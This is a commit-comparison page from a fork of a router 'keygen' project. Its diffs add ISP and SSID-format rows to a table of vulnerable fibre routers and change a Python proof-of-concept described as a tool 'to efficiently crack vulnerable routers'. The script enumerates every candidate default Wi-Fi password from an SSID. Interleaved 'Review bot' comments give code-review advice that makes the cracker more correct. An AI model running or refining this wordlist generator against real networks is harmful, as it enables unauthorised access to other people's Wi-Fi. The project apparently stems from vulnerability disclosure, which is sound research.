forked from g/nokia-keygen

Compare commits

4 Commits

Author SHA1 Message Date
b447889865 Updated tables of providers 2020-05-08 20:45:58 +02:00
0447c7daad Update 'Readme.md' 2020-05-06 20:01:57 +00:00
350e1aa5dd Merge branch 'master' of RealEnder/nokia-keygen into master 2020-05-06 19:24:12 +00:00
g b22d70ee63 Merge branch 'master' of RealEnder/nokia-keygen into master; Fix left zero padding 2020-05-06 18:10:35 +00:00

@ -13,6 +13,7 @@ This type of connection requires different equipment than ADSL/VDSL and thus spe
Technicolor, along with Alcatel-Lucent, Nokia and Huawei are the leading manufactures of these devices and the suppliers for ISPs. Unsurprisingly, many different devices from even different companies have the same components and sometimes even share some software stack: below is a noncomprehensive table of confirmed and suspected devices having the same common problems described later. Apparently there's also a reseller called Zhone that customizes the same CPE for some ISPs. Eltex might be another one.
_UPDATE:_ Thanks to some contributions some ISPs not in the original XML files have been added and other have been updated.
| CODE | Country | ISP | Manufacturer | Model | SSID Format |
|---|---|---|---|---|---|
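Review bot: The `_UPDATE:_ ` line says ISPs were added and others updated "thanks to some contributions" but does not say which rows those are, so a reader cannot tell entries taken from the original XML files from contributed ones. Consider marking the contributed rows in the table (a footnote marker or a source column would do), and fix the wording: "other have been updated" should read "others have been updated".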
@ -43,9 +44,11 @@ Technicolor, along with Alcatel-Lucent, Nokia and Huawei are the leading manufac
| LATT | Latvia | Lattelekom | Unknown | Unknown | `ALHN-%s` |
| JPNX | Japan | Unknown | Unknown | Unknown | `ALHN-%s` |
| LAOS | Laos | Sky Telecom | Unknown | Unknown | `SKYTEL-%4s` |
| VIVA | Bulgaria | Vivacom | Unknown | Unknown | `VIVACOM_FiberNet` |
| VIVA | Bulgaria | Vivacom | Unknown | Unknown | `VIVACOM_FiberNet-%4s` |
| PXSF | Belgium | Belgacom | Unknown | Unknown | Unspecified |
| OCIT | Ivory Coast | Orange Ivory Coast | Nokia | G-240W-A | `ORANGEFIBER-%4s` |
| Unknown | Caraibes | Canalbox Caraibes | Unknown | Unknown | `CANALBOX-%4s` |
| Unknown | Poland | Inea | Unknown | Unknown | `INEA-%4s` |
## FCC Infos
Different enclosures or slight variants of the same board can be identified by looking at the [documents published by Nokia for the FCC](https://fccid.io/2ADZR).
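Review bot: The Canalbox Caraibes and Inea rows put `Unknown` in the CODE column, where every other row in this hunk carries a four-letter code (`LATT`, `JPNX`, `LAOS`, `VIVA`, `PXSF`, `OCIT`), and `Caraibes` in the Country column is a region rather than a country. Since the README describes the table as listing both confirmed and suspected devices, these two rows should say which they are, and the Country cell should name the actual country or be labelled as a region.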
@ -493,28 +496,28 @@ With this information we can write a PoC script that can produce a wordlist to e
import argparse, base64, hashlib, re
def genpwd_longpasswd(oui, serialnum):
def str2md5(string):
m = hashlib.md5()
m.update(string.encode("ascii"))
return m.digest()
def str2md5(string):
m = hashlib.md5()
m.update(string.encode("ascii"))
return m.digest()
#secret1 = "%s-ALCL%s" % (oui, serialnum)
secret2 = "%s-01%u" % (oui, int(serialnum, 16))
#secret1 = "%s-ALCL%s" % (oui, serialnum)
secret2 = "%s-01%u" % (oui, int(serialnum, 16))
#md5_secret1 = str2md5(secret1)
md5_secret2 = str2md5(secret2)
#md5_secret1 = str2md5(secret1)
md5_secret2 = str2md5(secret2)
#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
lower = upper = 0
lower = upper = 0
for i in range(8):
upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
for i in range(8):
upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
longpasswd = ((upper<<32)+lower)%0x2540be400
longpasswd = ((upper<<32)+lower)%0x2540be400
return longpasswd
return longpasswd
parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers")
parser.add_argument("ssid", type=str, help="the ssid to attack")
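Review bot: Every line of `genpwd_longpasswd` in this hunk appears twice with the same visible text, so the change looks like re-indentation only, yet it arrives bundled with a commit whose message is "Fix left zero padding"; a whitespace-only change is easier to audit in a commit of its own. While these lines are being touched, the commented-out `secret1`, `md5_secret1` and `wanpasswd` lines should either be deleted or get a comment saying why they are kept, and `0x2540be400` deserves a comment that it is 10**10, since that is what limits the result to ten decimal digits.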
@ -551,8 +554,9 @@ for s in ssids:
serialBytes = args.ssid
for r in s.split("[A-F0-9]{4}"):
serialBytes = serialBytes.replace(r, "")
for i in range(0xffff):
print(genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes)))
for i in range(0xffff + 1):
candidate = genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes))
print(f"{candidate:010}")
break
```
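Review bot: The width in `print(f"{candidate:010}")` is a bare literal that has to stay in step with the `%0x2540be400` inside `genpwd_longpasswd`, and nothing in the visible lines ties the two together. Returning the zero-padded string from the function, or deriving both the modulus and the width from one named constant, would keep them from drifting apart. Two smaller points: `range(0xffff + 1)` reads more plainly as `range(0x10000)`, and the f-string makes the script require Python 3.6 or later, which the README should state.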